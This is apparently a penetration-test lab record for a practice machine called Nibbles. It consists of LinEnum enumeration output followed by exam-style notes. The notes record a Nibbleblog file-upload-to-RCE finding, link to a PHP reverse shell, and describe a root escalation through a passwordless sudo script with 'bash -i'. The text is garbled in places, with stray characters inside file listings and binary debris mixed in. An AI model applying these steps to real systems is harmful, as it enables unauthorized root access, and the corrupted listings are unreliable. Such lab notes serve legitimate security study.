root 382 Apr 16 2016 lvm2-pvscan@.service drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants -rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service -rw-r--r-e- 1 root root 251 Apr 5 2016 cron.service -rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service -rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service -rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service -rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path -rw-r--r-- 1 root root 169 Jan 14 2016 atd.service -rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service -rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service -rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service -rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service -rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer -rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 31 Oct 27 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lfrwxrwxrwx 1 root root 30 Oct 27 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 25 Oct 27 2017 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Oct 27 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Oct 27 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Oct 27 2017 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 30 Oct 27 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 31 Oct 27 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 24 Oct 27 2017 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 20 Oct 27 2017 cryptsetup.target -> ../cryptsetup.targegt lrwxrwxrwx 1 root root 22 Oct 27 2017 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Oct 27 2017 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Oct 27 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Oct 27 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Oct 27 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Oct 27 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Oct 27 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Oct 27 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Oct 27 2017 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 32 Oct 27 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 rooht root 27 Oct 27 2017 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 36 Oct 27 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Oct 27 2017 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Oct 27 2017 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Oct 27 2017 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Oct 27 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Oct 27 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 30 Oct 27 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service lrwxrwxrwx 1 root root 30 Sep 13 2017 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-start.service -> ../plymouth-stiart.service lrwxrwxrwx 1 root root 24 Feb 1 2017 console-setup.service -> ../console-setup.service lrwxrwxrwx 1 root root 25 Feb 1 2017 keyboard-setup.service -> ../keyboard-setup.service lrwxrwxrwx 1 root root 19 Feb 1 2017 setvtrgb.service -> ../setvtrgb.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Oct 27 2017 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Oct 27 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Oct 27 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Oct 27 2017 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Oct 27 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Oct 27 j2017 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Oct 27 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Oct 27 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 29 Sep 13 2017 plymouth-quit-wait.service -> ../plymouth-quit-wait.service lrwxrwxrwx 1 root root 24 Sep 13 2017 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 39 Oct 27 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 28 Sep 13 2017 plymouth-poweroff.service -> ../plymouth-poweroff.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 39 Oct 27 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 rookt root 26 Sep 13 2017 plymouth-reboot.service -> ../plymouth-reboot.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Oct 27 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/resolvconf.service.wants: total 0 lrwxrwxrwx 1 root root 42 Oct 27 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path /lib/systemd/system/sigpwr.target.wants: total 0 lrwxrwxrwx 1 root root 36 Oct 27 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Oct 27 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: total 4.0K -rw-r--r-- 1 root root 290 Oct 26 2017 debian.conf /lib/systemd/system/systemd-timesyncd.service.d: total 4.0K -rw-r--r-- 1 root root 251 Oct 26 2017 disable-with-time-daemon.conf /lib/systemd/system/systemdl-resolved.service.d: total 4.0K -rw-r--r-- 1 root root 200 Oct 27 2017 resolvconf.conf /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 24 Sep 13 2017 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx 1 root root 31 Sep 13 2017 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/systemd/system/kexec.target.wants: total 0 lrwxrwxrwx 1 root root 25 Sep 13 2017 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/busnames.target.wants: total 0 /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemmd/system/runlevel5.target.wants: total 0 /lib/systemd/system-shutdown: total 4.0K -rwxr-xr-x 1 root root 160 Nov 8 2017 mdadm.shutdown /lib/systemd/network: total 12K -rw-r--r-- 1 root root 404 Oct 27 2017 80-container-host0.network -rw-r--r-- 1 root root 482 Oct 27 2017 80-container-ve.network -rw-r--r-- 1 root root 80 Oct 27 2017 99-default.link /lib/systemd/system-generators: total 680K -rwxr-xr-x 1 root root 71K Oct 27 2017 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 59K Oct 27 2017 systemd-dbus1-generator -rwxr-xr-x 1 root root 43K Oct 27 2017 systemd-debug-generator -rwxr-xr-x 1 root root 79K Oct 27 2017 systemd-fstab-generator -rwxr-xr-x 1 root root 39K Oct 27 2017 systemd-getty-generator -rwxr-xr-x 1 root root 119K Oct 27 2017 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 39K Oct 27 2017 systemd-hibernate-resume-generator -rwxr-xr-x 1 root root 39K Oct 27 2017 systemd-insserv-generator -rwxr-xr-x 1 root root 35K Oct 27 2017 systemd-rc-local-generator -rwxr-xr-nx 1 root root 31K Oct 27 2017 systemd-system-update-generator -rwxr-xr-x 1 root root 103K Oct 27 2017 systemd-sysv-generator -rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 869 Oct 27 2017 90-systemd.preset /lib/systemd/system-sleep: total 4.0K -rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.16 [-] MYSQL version: mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper [-] Apache version: Server version: Apache/2.4.18 (Ubuntu) Server built: 2017-09-18T15:09:02 [-] Apache user configuration: APACHE_RUN_USER=nibbler APACHE_RUN_GROUP=nibbler [-] Installed Apache modules: Loaded Modules: core_module (static) so_module (static) watchdog_module (static) http_module (static) log_config_module (static) logio_module (static) o version_module (static) unixd_module (static) access_compat_module (shared) alias_module (shared) auth_basic_module (shared) authn_core_module (shared) authn_file_module (shared) authz_core_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) filter_module (shared) mime_module (shared) mpm_prefork_module (shared) negotiation_module (shared) php5_module (shared) setenvif_module (shared) status_module (shared) [-] www home dir contents: /var/www/: total 12K drwxr-xr-x 3 root root 4.0K Dec 10 2017 . drwxr-xr-x 14 root root 4.0K Dec 10 2017 .. drwxr-xr-x 3 root root 4.0K Dec 28 2017 html /var/www/html: total 16K drwxr-xr-x 3 root root 4.0K Dec 28 2017 . drwxr-xr-x 3 root root 4.0K Dec 10 2017 .. -rw-r--r-- 1 root root 93 Dec 28 2017 index.html d-wx-wx--x 7 nibbler nibbler 4.0K Dec 28 2017 nibbleblog ### INTERESTING FILES ########p############################ [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc /usr/bin/curl [-] Installed compilers: ii g++ 4:5.3.1-1ubuntu1 amd64 GNU C++ compiler ii g++-5 5.4.0-6ubuntu1~16.04.5 amd64 GNU C++ compiler ii gcc 4:5.3.1-1ubuntu1 amd64 GNU C compiler ii gcc-5 5.4.0-6ubuntu1~16.04.5 amd64 GNU C compiler [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1607 Dec 10 2017 /etc/passwd -rw-r--r-- 1 root root 772 Dec 10 2017 /etc/group -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile -rw-r----- 1 root shadow 1069 Dec 10 2017 /etc/shadow [-] SUID files: -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xrq-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsrr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mount [-] SGID files: -rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine -rwxr-sr-x 1 root tty 27368 Jun 14 2017 /usr/bin/wall -rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry -rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab -rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate -rwxr-sr-x 1 root shadow s62336 May 16 2017 /usr/bin/chage -rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write -rwxr-sr-x 1 root ssh 358624 Mar 16 2017 /usr/bin/ssh-agent [+] Files with POSIX capabilities set: /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr = cap_net_raw+ep /usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep [-] World-writable files (excluding /proc and /sys): --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.stervice/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by-id-dm-uuid-LVM-A8Nf2cf3f9JkrekQJrNARDzwv0j098QCY3Ohk3T8fhG01Olf9I72klADFcrUCqAM.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.sliceu/systemd-modules-load.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control --w--w--w- 1 root rovot 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-Shocker-vg-swap_1.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control --w--w--w- 1 root root 0 Aprw 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by-id-dm-name-Shocker--vg-swap_1.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/libx/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by-uuid-939ae702-ccfd-4e4e-ae41-696164404c16.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-dm-1.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/ylxcfs/cgroup/memory/system.slice/dev-mapper-Shocker--vg-swap_1.swap/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/mysql.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/apzparmor.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/ifup@ens32.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_{control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/system.slice/system-systemd-fsck.slice/cgroup.event_control --w--w--w- 1 root root 0 Apr 10 10:58 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control -rwxrwxrwx 1 nibbler nibbler 46631 Mar 22 21:36 /tmp/LinEnum.sh -rw-rw-rw- 1 nibbler nibbler 89691 Apr 10 10:58 /tmp/output.txt [-] NFS displaying partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if |disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> /dev/mapper/Shocker--vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation UUID=c227aef1-7e4c-4094-8b0b-095581dd0bc6 /boot ext2 defaults 0 2 /dev/mapper/Shocker--vg-swap_1 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 350 Sep 22 2017 /etc/popularity-contest.conf -rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf -rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf -rw-r--r-- 1 roo}t root 2084 Sep 6 2015 /etc/sysctl.conf -rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf -rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf -rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf -rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf -rw-r--r-- 1 root root 8464 Dec 10 2017 /etc/ca-certificates.conf -rw-r--r-- 1 root root 144 Sep 22 2017 /etc/kernel-img.conf -rw-r--r-- 1 root root 3028 Jul 19 2016 /etc/adduser.conf -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf -rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf -rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf -rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf -rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf -rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf -rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf -rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf -rw-r--r-- 1 root root 6816 May 11 2017 /etc/overlayroot.conf -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf -rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf [-] Current user's history files: -rw------- 1 nibbler nibbler 0 Dec 29 2017 /home/nibbler/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/nibbler/.bash_history [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root root 1607 Dec 10 2017 /var/backups/passwd.bak -rw------- 1 root shadow 1069 Dec 10 2017 /var/backups/shadow.bak -rw------- 1 root shadow 642 Dec 10 2017 /var/backups/gshadow.bak -rw------- 1 root root 772 Dec 10 2017 /var/backups/group.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Dec 10 2017 . drwxr-xr-x 14 root root 4096 Dec 10 2017 .. ### SCAN COMPLETE ####################################custom-colorsXAIZ|xAפ"O X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* sudo without password Vulnerability Type: Misconfiguration Exploit POC: Description: Discovery of Vulnerability LinEnum output [+] We can sudo without supplying a password! Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh Exploit Code Used monitor.sh > bash -i Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAפ"fȴibbleblog Vulnerability Type: Arbitrary File Upload/RCE Exploit POC: https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/ Description: Discovery of Vulnerability /nibbleblog/README Version 4.0.3 Exploit Code Used https://github.com/pentestmonkey/php-reverse-shell Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel 